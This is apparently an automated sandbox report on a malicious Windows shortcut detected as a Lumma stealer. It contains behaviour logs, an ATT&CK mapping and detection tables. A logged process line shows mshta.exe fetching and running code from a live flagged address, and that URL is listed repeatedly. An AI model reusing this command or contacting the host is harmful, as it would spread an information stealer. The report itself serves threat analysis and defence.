Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887AE0F6D sldt word ptr [eax]6_2_00007FF887AE0F6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5991Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3832Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4666Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 735Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 4666 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 735 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6968Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000005.00000002.2637014653.0000023A49318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2637014653.0000023A49363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2638426780.000001B0EB42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639900329.000001B0F0A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpx3I:
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://80.76.51.231/SamarikJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		12
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		41
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1569818 Sample: 6G4au3vWsI.lnk Startdate: 06/12/2024 Architecture: WINDOWS Score: 96 29 Antivirus detection for URL or domain 2->29 31 Windows shortcut file (LNK) starts blacklisted processes 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 5 other signatures 2->35 7 WMIC.exe 1 2->7         started        10 svchost.exe 1 1 2->10         started        process3 dnsIp4 37 Suspicious powershell command line found 7->37 39 Contains functionality to create processes via WMI 7->39 41 Creates processes via WMI 7->41 13 powershell.exe 15 7->13         started        16 conhost.exe 1 7->16         started        27 127.0.0.1 unknown unknown 10->27 signatures5 process6 signatures7 43 Windows shortcut file (LNK) starts blacklisted processes 13->43 18 mshta.exe 14 13->18         started        21 powershell.exe 28 13->21         started        23 conhost.exe 13->23         started        process8 dnsIp9 25 80.76.51.231, 443, 49707, 49710 CLOUDCOMPUTINGDE Bulgaria 18->25

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
6G4au3vWsI.lnk26%ReversingLabsWin32.Trojan.Lummastealer
6G4au3vWsI.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://80.76.51.231/Samarik=0%Avira URL Cloudsafe
https://80.76.51.231/SamarikE0%Avira URL Cloudsafe
https://80.76.51.231/SamarikH0%Avira URL Cloudsafe
https://80.76.51.231/SamarikC:0%Avira URL Cloudsafe
https://80.76.51.231/SamarikCH&0%Avira URL Cloudsafe
http://www.microsoft.0%Avira URL Cloudsafe
https://80.76.51.231/SamarikZHO0%Avira URL Cloudsafe
https://80.76.51.231/SamarikZY~0%Avira URL Cloudsafe
https://80.76.51.231/SamarikCE0B0%Avira URL Cloudsafe
https://80.76.51.231/Samarik/100%Avira URL Cloudmalware
https://80.76.51.231/Samarik100%Avira URL Cloudmalware
https://80.76.51.231/Samarikr0%Avira URL Cloudsafe
https://80.76.51.231/Samarikuo0%Avira URL Cloudsafe
https://80.76.51.231/Samarik...100%Avira URL Cloudmalware
https://80.76.51.231/Samarik-1-0/0%Avira URL Cloudsafe
https://oneget.orgX0%Avira URL Cloudsafe
https://oneget.org0%Avira URL Cloudsafe
https://80.76.51.231/0%Avira URL Cloudsafe
https://80.76.51.231/Samarik1-1-0#0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1444531399.00000221802D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.00000221901C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1444531399.0000022181B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000006.00000002.1444531399.000002218192C000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://80.76.51.231/Samarik=mshta.exe, 00000005.00000002.2637715324.0000023A494D0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1444531399.0000022181B30000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1444531399.0000022181B30000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://80.76.51.231/SamarikHmshta.exe, 00000005.00000002.2636956149.0000023A49270000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://80.76.51.231/SamarikEmshta.exe, 00000005.00000002.2637014653.0000023A49318000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://go.micropowershell.exe, 00000006.00000002.1444531399.0000022180F2C000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Iconpowershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://80.76.51.231/Samarik/mshta.exe, 00000005.00000002.2637014653.0000023A49318000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://crl.ver)svchost.exe, 0000000B.00000002.2639952714.000001B0F0A85000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://www.microsoft.powershell.exe, 00000006.00000002.1464128230.00000221F507B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://80.76.51.231/SamarikZY~mshta.exe, 00000005.00000002.2637014653.0000023A492A0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://80.76.51.231/SamarikC:mshta.exe, 00000005.00000002.2637014653.0000023A492A0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://80.76.51.231/SamarikCH&mshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://80.76.51.231/SamarikZHOmshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://80.76.51.231/SamarikCE0Bmshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://80.76.51.231/Samarikuomshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1444531399.0000022181B30000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://80.76.51.231/Samarikmshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2637014653.0000023A492A0000.00000004.00000020.00020000.00000000.sdmp, 6G4au3vWsI.lnktrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://80.76.51.231/Samarikrmshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://80.76.51.231/Samarik...mshta.exe, 00000005.00000002.2637014653.0000023A4936E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2637014653.0000023A49359000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://g.live.com/odclientsettings/Prod-C:qmgr.db.11.drfalse
                      		high
                      https://80.76.51.231/mshta.exe, 00000005.00000002.2637014653.0000023A49352000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 0000000B.00000003.2316039782.000001B0F0C00000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1444531399.00000221802D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.00000221901C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1444531399.0000022181B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://oneget.orgXpowershell.exe, 00000006.00000002.1444531399.000002218192C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
